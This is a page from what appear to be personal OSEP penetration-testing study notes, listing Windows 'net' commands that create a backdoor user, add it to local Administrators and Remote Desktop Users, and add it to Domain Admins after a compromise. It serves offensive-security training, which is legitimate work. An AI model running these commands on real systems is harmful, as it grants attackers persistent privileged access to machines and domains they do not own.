OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • Add Local System User
  • Add Domain Admin User
  1. OSEP
  2. Post Exploitation

Add User

Add Local System User

net user stevv Password123! /add 
net localgroup Administrators stevv /add
net localgroup "Remote Desktop Users" stevv /add

Add Domain Admin User

net user stevv Password123! /add /domain
net localgroup "Remote Desktop Users" stevv /add /domain
net group "domain admins" stevv /add /domain

net localgroup "Remote Desktop Users" administrator /add /domain
PreviousPost ExploitationNextAMSI, CLM, & App Locker

Last updated 1 year ago